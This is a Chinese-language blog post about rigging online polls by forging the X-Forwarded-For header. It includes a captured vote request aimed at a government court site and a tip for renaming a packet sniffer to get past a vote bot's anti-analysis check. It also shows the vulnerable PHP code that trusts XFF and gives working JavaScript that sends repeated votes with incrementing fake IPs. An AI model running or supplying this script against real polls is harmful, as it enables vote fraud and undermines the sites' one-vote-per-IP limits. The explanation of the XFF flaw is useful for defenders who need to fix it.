投票網站檢查IP，限制一個IP只允許投票一次，那麼只有使用代理，或者通過不停的斷網和撥號才能實現。我實在想不到其他好辦法，後來這個朋友找到了一個可以極速在這個網站投票的程式，我對這個程式的IP解決方案很好奇就問朋友要來想分析一下。

首先我是採取對這個投票軟體進行抓包的方式來研究，準備好了之後，開啟投票程式“刷！提示軟體衝突！”暈，不會吧，那我就關掉一些程式，都關完了只留一個抓包程式還提示衝突，呵呵，原來這個程式竟然還知道有人可能會分析他的軟體，竟然遍歷程序名稱，檢查是否有可疑的程式，如果有程式對他進行分析或者抓包，他就拒絕執行。呵呵，目前我知道他限制的軟體有易語言程式設計軟體，還有 WSockExpert_Cn 抓包軟體。呵呵，關了易語言，把 WSockExpert_Cn 名稱改一下，順利通過軟體的自身安全檢測，執行成功。

以下是我在使用過程中他投票是的資料包： POST /vote/view.php?sid=33&act=vote HTTP/1.1
Accept: */*
Referer: http://www.qdnfy.gov.cn/vote/vote.php
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 218.20.218.200
CLIENT_IP: 218.20.218.200
VIA: 218.20.218.200
REMOTE_ADDR: 218.20.218.200
Accept-Language: zh-cn
Accept-Encoding: text
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)
Host: 

www.qdnfy.gov.cn
Cookie: PHPSESSID=pldjnb6scereodjm5niqb9q990
Content-Length: 49
Connection: Close

X-Forwarded-For   發現了這個http頭引數  後面跟著IP，呵呵，這個引數肯定有來頭，原來我一直不知道，呵呵，趕緊百度一下。

下面是百度後的一篇說明文章，說得很好，大家看看。

偽造HTTP頭中的X-Forwarded-For欄位來偽造IP
百度了一下X-Forwarded-For的原理,這東西出來好長時間了.我還第一次聽說
X-Forwarded-For:簡稱XFF頭，它代表客戶端，也就是HTTP的請求端真實的IP，只有在通過了HTTP 代理或者負載均衡伺服器時才會新增該項。
它不是RFC中定義的標準請求頭資訊，在squid快取代理伺服器開發文件中可以找到該項的詳細介紹。
標準格式如下：
X-Forwarded-For: client1, proxy1, proxy2
從標準格式可以看出，X-Forwarded-For頭資訊可以有多個，中間用逗號分隔，第一項為真實的客戶端ip，剩下的就是曾經經過的代理或負載均衡的ip地址，經過幾個就會出現幾個。
wiki 的X-Forwarded-For解釋 

http://en.wikipedia.org/wiki/X-Forwarded-For
分析:
既然是要偽造客戶端IP,那我們先看看一般是怎樣獲取客戶端IP地址的(以php為例).這段程式碼是在百度搜索到的.大部分網站可能都用這段程式碼
 
<?php 
$user_IP = ($_SERVER["HTTP_VIA"]) ? //是否使用了代理 
$_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; 
//獲取失敗則從REMOTE_ADDR獲取
$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"]; 
?>
首先判斷HTTP_VIA頭是否存在,HTTP_VIA頭代表是否使用了代理伺服器.如果沒有那就從REMOTE_ADDR欄位獲取客戶端的IP地址,如果有那就從X-Forwarded-For獲取客戶端IP
我估計很多程式設計師都是從百度來的程式碼吧.asp也類似.
然後我們來測試一下.
服務端程式碼:
 
<?php 
//輸出HTTP_X_FORWARDED_FOR 
echo "HTTP_X_FORWARDED_FOR:".$_SERVER["HTTP_X_FORWARDED_FOR"]; 
//輸出REMOTE_ADDR echo "REMOTE_ADDR:". $_SERVER["REMOTE_ADDR"]; 
?>

可以看到獲取到的客戶端ip地址是不一樣的.REMOTE_ADDR為真實地址.
所以一個網站如果是從X-Forwarded-For來判斷客戶端IP地址的話,那麼我們就可以利用這個邏輯漏洞刷票了.剛好我同學那個網站就是.
演示地址:http://87year.info/t00ls/vote/index.html(右鍵可檢視所有客戶端原始碼)

附客戶端程式碼:
<script>
function CreateXMLHttp(){
var xmlhttp=false;//建立一個新變數並賦值false，使用false作為判斷條件說明還沒有建立XMLHTTPRequest物件
try{
xmlhttp=new XMLHttpRequest();//嘗試建立 XMLHttpRequest 物件，除 IE 外的瀏覽器都支援這個方法。
}catch(e){
try{
xmlhttp=ActiveXobject("Msxml12.XMLHTTP");//使用較新版本的 IE 建立 IE 相容的物件（Msxml2.XMLHTTP）。
}catch(e){
try{
xmlhttp=ActiveXobject("Microsoft.XMLHTTP");//使用較老版本的 IE 建立 IE 相容的物件（Microsoft.XMLHTTP）。
}catch(failed){
xmlhttp=false;//如果失敗了還保持false
}
}
}
return xmlhttp;
}
var g_i=0;
function $(obj){
return document.getElementById(obj);
}
function onSearch()
{
var g_xmlhttp=CreateXMLHttp();
if (g_xmlhttp==false)
{
alert("你的瀏覽器不支援ajax");
return;
}
var sendData="bid="+$("id").value;
var fakeIP=$("ip").value+g_i;
//alert(fakeIP);return ;
g_xmlhttp.open("POST","http://192.168.15.166/ip.php",true);
g_xmlhttp.setRequestHeader("Content-Length",sendData.Length);
g_xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
g_xmlhttp.setRequestHeader("X-Forwarded-For",fakeIP);
g_xmlhttp.onreadystatechange=function(){
if(/*g_xmlhttp.status==200*/g_xmlhttp.readyState==4)
{
$("res").innerHTML+=g_xmlhttp.responseText+"</br>";
if(++g_i<5)
{
setTimeout("onSearch()",1000);
}
}
}
g_xmlhttp.send(sendData);
}
</script>
<form name="form1" method="post" action="" id="form1">
<div>
<br />
ip地址:<input id="ip" type="text" value="200.156.4." /></br>
投票ID:<input id="id" type="text" value="232" /></br>
<input id="search" type="button" value="開始" />
<br />
<br />
<span id="res"></span>
<br />
<br />
</div>
</form>